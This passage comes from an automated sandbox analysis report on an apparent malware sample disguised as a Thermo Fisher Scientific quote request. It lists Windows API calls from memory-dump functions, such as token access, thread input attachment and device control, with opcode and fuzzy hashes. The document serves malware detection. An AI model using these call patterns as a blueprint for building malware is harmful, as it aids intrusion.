                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: 4f6a4e53362c95cfb17e96175a380d30cbf686f7cc0068efa53ff2478c437fa2
                                                              • Instruction ID: 927456a2b8f908fabe47322af2563e8566cb08322e4c7903c6cffa6e9f6cc738
                                                              • Opcode Fuzzy Hash: 4f6a4e53362c95cfb17e96175a380d30cbf686f7cc0068efa53ff2478c437fa2
                                                              • Instruction Fuzzy Hash: 4B119331345111AFD744AB64CC15FBA779BAF85320F144219F916C72E2DBB4AD418794
                                                              APIs
                                                                • Part of subcall function 00641E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00640ABB,?,?,?,0064187A,00000000,000000EF,00000119,?,?), ref: 00641E77
                                                                • Part of subcall function 00641E68: lstrcpyW.KERNEL32(00000000,?,?,00640ABB,?,?,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00641E9D
                                                                • Part of subcall function 00641E68: lstrcmpiW.KERNEL32(00000000,?,00640ABB,?,?,?,0064187A,00000000,000000EF,00000119,?,?), ref: 00641ECE
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00640AD4
                                                              • lstrcpyW.KERNEL32(00000000,?,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00640AFA
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00640B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: 100708f0fed54b239ea8e6c9e06856de16237c3e2a93208cff34ecff599bf16e
                                                              • Instruction ID: e001f946cfddbf7b158357ef7c54e1a6aef6acf749a3e89468eb3e43c5ae38c5
                                                              • Opcode Fuzzy Hash: 100708f0fed54b239ea8e6c9e06856de16237c3e2a93208cff34ecff599bf16e
                                                              • Instruction Fuzzy Hash: 7A11E63A200305BFDB25AF34DC45DBA77AAFF49354B80412AF906CB290EB729841C7E4
                                                              APIs
                                                              • _free.LIBCMT ref: 00632FB5
                                                                • Part of subcall function 0062395C: __FF_MSGBANNER.LIBCMT ref: 00623973
                                                                • Part of subcall function 0062395C: __NMSG_WRITE.LIBCMT ref: 0062397A
                                                                • Part of subcall function 0062395C: RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000001,00000000,?,?,0061F507,?,0000000E), ref: 0062399F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 8c1e5cc5fc207aa005aea190592acaaf438db6ae13e807be880ff7eac296f601
                                                              • Instruction ID: 087eb2e7eb3b4c49dc78004c629c5e28338578b2097e107d15ac08f235dd1c24
                                                              • Opcode Fuzzy Hash: 8c1e5cc5fc207aa005aea190592acaaf438db6ae13e807be880ff7eac296f601
                                                              • Instruction Fuzzy Hash: 6911E372548A32AFDB253F70BC14AAA3BA7AF15360F20452DF8499A391DB34C9408FD4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006405AC
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006405C7
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006405DD
                                                              • FreeLibrary.KERNEL32(?), ref: 00640632
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                              • String ID:
                                                              • API String ID: 3137044355-0
                                                              • Opcode ID: b56a25ed85893d9bbdb03bc5b9a17bac77ccc533498275d03ee02518f9d8f451
                                                              • Instruction ID: 8059f850d7329c7af256c7a11ae4099b6f5d1781d633b7f300cba579898a4b1e
                                                              • Opcode Fuzzy Hash: b56a25ed85893d9bbdb03bc5b9a17bac77ccc533498275d03ee02518f9d8f451
                                                              • Instruction Fuzzy Hash: 2021DD71900229FFEB20DF94DC98ADABBBAEF40300F00856DE61792150DBB4EA55DF60
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00646733
                                                              • _memset.LIBCMT ref: 00646754
                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006467A6
                                                              • CloseHandle.KERNEL32(00000000), ref: 006467AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                              • String ID:
                                                              • API String ID: 1157408455-0
                                                              • Opcode ID: b75905c94392321bddeb16018ed53de7effbabf924cfcfe96c20c186d4829b92
                                                              • Instruction ID: afa60a780213d43387a61ae2952281732177bf4b3c8463909201ab75f73592c9
                                                              • Opcode Fuzzy Hash: b75905c94392321bddeb16018ed53de7effbabf924cfcfe96c20c186d4829b92
                                                              • Instruction Fuzzy Hash: B411E7759012287AE72067A5AC4DFEBBBBCEF45764F10429AF504E71D0D2704E808B75
                                                              APIs
                                                                • Part of subcall function 0063AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0063AA79
                                                                • Part of subcall function 0063AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0063AA83
                                                                • Part of subcall function 0063AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0063AA92
                                                                • Part of subcall function 0063AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0063AA99
                                                                • Part of subcall function 0063AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0063AAAF
                                                              • GetLengthSid.ADVAPI32(?,00000000,0063ADE4,?,?), ref: 0063B21B
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0063B227
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0063B22E
                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 0063B247
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                              • String ID:
                                                              • API String ID: 4217664535-0
                                                              • Opcode ID: 925dc1495836cbb823bb0fed5504280eb42185232653b03166396c33d2c8d9f7
                                                              • Instruction ID: 56bd1855dd9deb5a6a63f21af36e626b4d4199787ed6220eb52e33c5fe3be638
                                                              • Opcode Fuzzy Hash: 925dc1495836cbb823bb0fed5504280eb42185232653b03166396c33d2c8d9f7
                                                              • Instruction Fuzzy Hash: 8B116071A00205BFDB049F94DC85ABFB7AAEF85314F14A12EE68297250D7319F44DB60
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0063B498
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0063B4AA
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0063B4C0
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0063B4DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 7f61d4672ccb6dca9625ad4248d22c2c3abce577a805be4f3f3fe6927ad184d6
                                                              • Instruction ID: f9143b6ee7701763a8140396660b4ea0ebd673358838ded2ac62b8e893efc5fc
                                                              • Opcode Fuzzy Hash: 7f61d4672ccb6dca9625ad4248d22c2c3abce577a805be4f3f3fe6927ad184d6
                                                              • Instruction Fuzzy Hash: 63115A7A900218FFDB11DFA8C981EDDBBB5FB08700F204091E604B7295D771AE11DB94
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0061B5A5
                                                              • GetClientRect.USER32(?,?), ref: 0067E69A
                                                              • GetCursorPos.USER32(?), ref: 0067E6A4
                                                              • ScreenToClient.USER32(?,?), ref: 0067E6AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: bef53882b86041461cc73abafdad28c0da29800a560d8b292c825a8b8acf884a
                                                              • Instruction ID: d4f04c4c804813c23b50e99817642f86082c61ef821138d8f86be41f2735a0ba
                                                              • Opcode Fuzzy Hash: bef53882b86041461cc73abafdad28c0da29800a560d8b292c825a8b8acf884a
                                                              • Instruction Fuzzy Hash: B2113671900029BBCB10DF94D8459EE7BBBEB0A304F041459E901E7281D330AA96CBB5
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00647352
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00647385
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0064739B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006473A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: fcfec9cb38eac682b7ed3ffb681a047e948926df997e2bb94de80e26e206f634
                                                              • Instruction ID: 331cb51b9dff04c2ba3867745ed5b326e9a3fe78f7ef08fe14cbffd12891f3bf
                                                              • Opcode Fuzzy Hash: fcfec9cb38eac682b7ed3ffb681a047e948926df997e2bb94de80e26e206f634
                                                              • Instruction Fuzzy Hash: 2D11A572A04224BBCB029FACDC09EEE7BAB9B49350F144355F925D3391D7749E009BB1
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
                                                              • GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateMessageObjectSendStockWindow
                                                              • String ID:
                                                              • API String ID: 3970641297-0
                                                              • Opcode ID: b47a9b3e7d2df9a45daa8a2d00d98674d72f64f18ccf1655de2894d9098fe7ae
                                                              • Instruction ID: 23c90f2cf9bf32bbf4cbba9e6a425dff328fc4c0cc10021fb582b4b721c4ce3e
                                                              • Opcode Fuzzy Hash: b47a9b3e7d2df9a45daa8a2d00d98674d72f64f18ccf1655de2894d9098fe7ae
                                                              • Instruction Fuzzy Hash: 6C11C072101509BFEF024F90DC56EEABB6BFF093A4F085206FA0452150C732DCA0DBA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction ID: d82ac1f5a7186fa27b1b16c4210a4880429131c6321d6d5a15e59827fbb3c4de
                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction Fuzzy Hash: 8A014C3200014EBBCF525E84DC018EE7F63BB18391F588455FE1959131DB36EAB2AB85
                                                              APIs
                                                                • Part of subcall function 00627A0D: __getptd_noexit.LIBCMT ref: 00627A0E
                                                              • __lock.LIBCMT ref: 0062748F
                                                              • InterlockedDecrement.KERNEL32(?), ref: 006274AC
                                                              • _free.LIBCMT ref: 006274BF
                                                              • InterlockedIncrement.KERNEL32(00BA2B88), ref: 006274D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 2704283638-0
                                                              • Opcode ID: 3d7cf9c1626bdaa361747204596efe29fe574e70b23f8046bb13d38699b01595
                                                              • Instruction ID: 6e5dbe9269177b1d92e33b0e15426f2fbc2212e8aa2a445feb378f14e1dd5575
                                                              • Opcode Fuzzy Hash: 3d7cf9c1626bdaa361747204596efe29fe574e70b23f8046bb13d38699b01595
                                                              • Instruction Fuzzy Hash: CA01E131909E30ABC751BF65B905B9DBBA3BF05711F144109F814A7381CB345940CFD6
                                                              APIs
                                                                • Part of subcall function 0061AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0061AFE3
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061AFF2
                                                                • Part of subcall function 0061AF83: BeginPath.GDI32(?), ref: 0061B009
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061B033
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0066EA8E
                                                              • LineTo.GDI32(00000000,?,?), ref: 0066EA9B
                                                              • EndPath.GDI32(00000000), ref: 0066EAAB
                                                              • StrokePath.GDI32(00000000), ref: 0066EAB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              • Opcode ID: b21952198682d99b4eee9e0edc36b47262a53b281e83c88b4485146ab0b7c97d
                                                              • Instruction ID: de899c2959e36a0f40db5eaa583898f7436b34f268ab8370c8308598588aea68
                                                              • Opcode Fuzzy Hash: b21952198682d99b4eee9e0edc36b47262a53b281e83c88b4485146ab0b7c97d
                                                              • Instruction Fuzzy Hash: 3BF08231005259BBDB12AF94AC0DFCE3F1BAF06311F084201FA11651E1C7B55652DBE9
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0063C84A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0063C85D
                                                              • GetCurrentThreadId.KERNEL32 ref: 0063C864
                                                              • AttachThreadInput.USER32(00000000), ref: 0063C86B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              • Opcode ID: 1809b812d48678a6dfabde0ae427516c8a5753b9d11983cd1e81e68234706b16
                                                              • Instruction ID: c54f88d7a7cffef0106b776ca0b4ad26fd7c96b8ad7b9c977bcb488c9ebcddf1
                                                              • Opcode Fuzzy Hash: 1809b812d48678a6dfabde0ae427516c8a5753b9d11983cd1e81e68234706b16
                                                              • Instruction Fuzzy Hash: 4DE06D71141228BADB201BA2DC0DEDB7F2EEF067B1F008121B60D944A0D6B1C681DBF0
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0063B0D6
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0063AC9D), ref: 0063B0DD
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0063AC9D), ref: 0063B0EA
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0063AC9D), ref: 0063B0F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: be76aee3842c1d791950dfc984321e04a4cc03e04803148a43f1ca8ffd57fd6a
                                                              • Instruction ID: c1dae23c6f49f559b173ba7c2a8e63a5aa7cb1817fa6026fbc591e69b86e02f1
                                                              • Opcode Fuzzy Hash: be76aee3842c1d791950dfc984321e04a4cc03e04803148a43f1ca8ffd57fd6a
                                                              • Instruction Fuzzy Hash: 4BE04F32601211ABD7202FB15C0CF873BAAAF55795F119918A281D6080DB7484018771
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0061B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0061B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0061B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0061B4BD
                                                              • GetWindowDC.USER32(?,00000000), ref: 0067DE2B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0067DE38
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0067DE51
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0067DE6A
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0067DE8A
                                                              • ReleaseDC.USER32(?,00000000), ref: 0067DE95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 52c9542a9a9fa4bca9bb33aebabf4a49cbbe0a718fb48747c009f36d6b044a3a
